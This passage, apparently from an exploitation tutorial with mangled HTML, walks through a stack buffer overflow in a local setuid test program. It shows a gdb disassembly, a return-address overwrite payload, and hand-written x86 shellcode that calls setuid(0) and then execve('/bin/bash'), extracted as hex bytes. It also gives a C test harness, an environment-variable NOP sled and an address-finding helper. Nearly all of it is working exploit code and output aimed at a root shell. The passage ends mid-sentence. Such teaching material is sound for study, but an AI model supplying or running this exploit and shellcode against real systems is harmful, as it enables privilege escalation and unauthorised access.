[esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pI use the code-q/code option to codegdb/code to supress the informational message that it normally splits out on started, I then set the disassembly flavor to codeintel/code format because codegdb/code defaults to ATamp;T format and I prefer intel./p pThe call to codeprintfile/code on line 41 looks like a good choice to jump to and as we can see it is at address code0x0804869b/code. All we need to do is put this address in, in reverse due to a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a, after 528 bytes, heres how:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x9b\x86\x04\x08quot;#39;/spanspan class="o")/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pWe still get a segmentation fault but it outputs the contents of the file meaning we've circumvented the password protection./p h2Developing Shellcode / Improving Exploitation/h2 pNow I'm going to show you how to use this to run your own code as root. First we need some code to run. I've written a quick a href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank"assembly/a application in a href="http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html?iid=tech_vt_tech+64-32_manuals" target="_blank"IA32 format/a which just runs the execve a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system call/a with /bin/bash as its argument (for more information on execve itself see a href="http://linux.die.net/man/2/execve" target="_blank"man execve/a):/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/span/span span class="code-line"/span span class="code-line"span class="k"global /spanspan class="nv"_start/span/span span class="code-line"/span span class="code-line"span class="k"section /spanspan class="nv".text/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/span/span span class="code-line" span class="nf"jmp/span span class="nv"short/span span class="nv"Call_shellcode/span span class="c1"; jump to where our string is/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/span/span span class="code-line" span class="nf"pop/span span class="nb"ebx/span span class="c1"; pop the address of our string into ebx/span/span span class="code-line" span class="c1"; which is the first argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"eax/spanspan class="p",/span span class="nb"eax/span span class="c1"; zero out the eax register/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"9/spanspan class="p"],/span span class="nb"al/span span class="c1"; put a 0 where the A is to null/span/span span class="code-line" span class="c1"; terminate the /bin/bash string/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0xb/span span class="c1"; put the sys call number 11 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"],/span span class="nb"ebx/span span class="c1"; put a pointer to the beginning/span/span span class="code-line" span class="c1"; of the string where the BBBB is/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span span class="c1"; zero out the ecx register/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"],/span span class="nb"ecx/span span class="c1"; replace the CCCC with 0000/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"ecx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to BBBB into ecx the second/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"edx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to CCCC into edx the third/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall execve/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/span/span span class="code-line" span class="nf"call/span span class="nv"shellcode/span span class="c1"; call the start of the actual application/span/span span class="code-line" span class="nl"shell:/span span class="kd"db/span span class="s"quot;/bin/bashABBBBCCCCquot;/span span class="c1"; our string of/span/span span class="code-line" span class="c1"; arguments to execve/span/span span class="code-line"/code/pre/div /td/tr/table pA system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx, edx registers respectively; and then running codeint 0x80/code to execute the system call. To find the sys call number do this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangrep execve /usr/include/i386-linux-gnu/asm/unistd_32.h/span span class="code-line"span class="gp"#/spandefine __NR_execve span class="m"11/span/span span class="code-line"/code/pre/div /td/tr/table pThis means execve is 11 or 0xb in hex./p pIn this shellcode I'm using the jmp-call-pop technique to get the address of the string and the list of arguments (When you do a call instruction, the address of the next instruction is pushed onto the stack), this makes the code position independent. So we now need to extract this shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o shell.o shell.nasm/span span class="code-line"span class="gp"[email protected]:~$ /spanld -o shell shell.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./shellspan class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"/code/pre/div /td/tr/table pWe have shellcode now but we should test it to make sure it works, the following C application can do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"unsigned/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"code/spanspan class="p"[]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /span\/span span class="code-line"span class="s"quot;/spanspan class="se"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="s"quot;/spanspan class="se"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="s"quot;/spanspan class="se"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="err"\/spanspan class="n"x62/spanspan class="err"\/spanspan class="n"x61/spanspan class="err"\/spanspan class="n"x73/spanspan class="err"\/spanspan class="n"x68/spanspan class="err"\/spanspan class="n"x41/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="s"quot;;/span/span span class="code-line"/span span class="code-line"span class="n"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Shellcode Length: %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"code/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="p"(/spanspan class="o"*/spanspan class="n"ret/spanspan class="p")()/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p"(/spanspan class="o"*/spanspan class="p")())/spanspan class="n"code/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"ret/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pI've split it up onto multiple lines here for readability. Compiling it and running it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangcc -z execstack -o shellcode shellcode.c/span span class="code-line"span class="gp"[email protected]:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 49/span/span span class="code-line"span class="gp"[email protected]:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pIt worked, the application codeshellcode/code just sets the return value of the main function to the address of the beginning of our shellcode which run's it because you can't just run it manually:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./shell/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to figure out a way to put our shellcode in memory and find its address to hijack execution of our vulnerable application with. We can put it in an environment varable and use a href="http://linux.die.net/man/3/getenv" target="_blank"getenv/a to get its address, here is how we put it into an environment variable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"/code/pre/div /td/tr/table pHere is another C application that we can use to get the address of an environment variable in the memory of another application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"argv/spanspan class="p"[])/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"ptr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"3/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;environment variablegt; lt;target program namegt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"ptr/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getenv/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w" /spanspan class="cm"/* get env var location *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"ptr/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="p"(/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"2/spanspan class="p"]))/spanspan class="o"*/spanspan class="mi"2/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* adjust for program name *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%s will be at %p/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"],/spanspan class="w" /spanspan class="n"ptr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pWe compile this application and run it with the relevent arguments:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangcc -o getenvaddr getenvaddr.c/span span class="code-line"span class="gp"[email protected]:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff774/span/span span class="code-line"/code/pre/div /td/tr/table pGreat! Nearly there, we've got the address of our shellcode now to use it. We will hijack the execution flow as we did before but this time we will point to the address of our environment variable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x74\xf7\xff\xbfquot;#39;/spanspan class="o")/span/span span class="code-line"span class="go"bash-4.2$ whoami/span/span span class="code-line"span class="go"testuser/span/span span class="code-line"span class="go"bash-4.2$ cat secret.txt/span/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pDamn! So it didn't work. It must be dropping privileges, no need to worry, but we now to to change our shellcode to run the setuid system call before executing execve and set the uid to 0 (or root) (for more information on setuid see a href="http://linux.die.net/man/2/setuid" target="_blank"man setuid/a). First we need to find out the sys call number:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangrep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h/span span class="code-line"span class="gp"#/spandefine __NR_setuid span class="m"23/span/span span class="code-line"span class="gp"#/spandefine __NR_setuid32 span class="m"213/span/span span class="code-line"/code/pre/div /td/tr/table pThe sys call number is 23 or 0x17 in hex, our modified shellcode is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/span/span span class="code-line"/span span class="code-line"span class="k"global /spanspan class="nv"_start/span/span span class="code-line"/span span class="code-line"span class="k"section /spanspan class="nv".text/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/span/span span class="code-line" span class="nf"jmp/span span class="nv"short/span span class="nv"Call_shellcode/span span class="c1"; jump to where our string is/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/span/span span class="code-line" span class="nf"xor/span span class="nb"eax/spanspan class="p",/span span class="nb"eax/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x17/span span class="c1"; put 23 into eax to setuid/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ebx/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out ebx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; make the syscall setuid/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"eax/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"pop/span span class="nb"ebx/span span class="c1"; pop the address of our string into ebx/span/span span class="code-line" span class="c1"; which is the first argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"9/spanspan class="p"],/span span class="nb"al/span span class="c1"; put a 0 where the A is to null/span/span span class="code-line" span class="c1"; terminate the /bin/bash string/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0xb/span span class="c1"; put the sys call number 11 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"],/span span class="nb"ebx/span span class="c1"; put a pointer to the beginning/span/span span class="code-line" span class="c1"; of the string where the BBBB is/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span span class="c1"; zero out the ecx register/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"],/span span class="nb"ecx/span span class="c1"; replace the CCCC with 0000/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"ecx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to BBBB into ecx the second/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"edx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to CCCC into edx the third/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall execve/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/span/span span class="code-line" span class="nf"call/span span class="nv"shellcode/span span class="c1"; call the start of the actual application/span/span span class="code-line" span class="nl"shell:/span span class="kd"db/span span class="s"quot;/bin/bashABBBBCCCCquot;/span span class="c1"; our string of/span/span span class="code-line" span class="c1"; arguments to execve/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the same as before except I added a call to setuid before it starts setting up the call to execve. Let's first make sure it works:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o shell2.o shell2.nasm/span span class="code-line"span class="gp"[email protected]:~$ /spanld -o shell2 shell2.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./shell2span class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat shellcode.c/span span class="code-line"span class="gp"#/spanincludelt;stdio.hgt;/span span class="code-line"span class="gp"#/spanincludelt;string.hgt;/span span class="code-line"/span span class="code-line"span class="go"unsigned char code[] = \/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;;/span/span span class="code-line"/span span class="code-line"span class="go"main()/span/span span class="code-line"span class="go"{/span/span span class="code-line"/span span class="code-line"span class="go" printf(quot;Shellcode Length: %d\nquot;, strlen(code));/span/span span class="code-line"/span span class="code-line"span class="go" int (*ret)() = (int(*)())code;/span/span span class="code-line"/span span class="code-line"span class="go" ret();/span/span span class="code-line"/span span class="code-line"span class="go"}/span/span span class="code-line"span class="gp"[email protected]:~$ /spangcc -z execstack -o shellcode shellcode.c/span span class="code-line"span class="gp"[email protected]:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 57/span/span span class="code-line"span class="gp"[email protected]:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pThat seems to work, let's test it 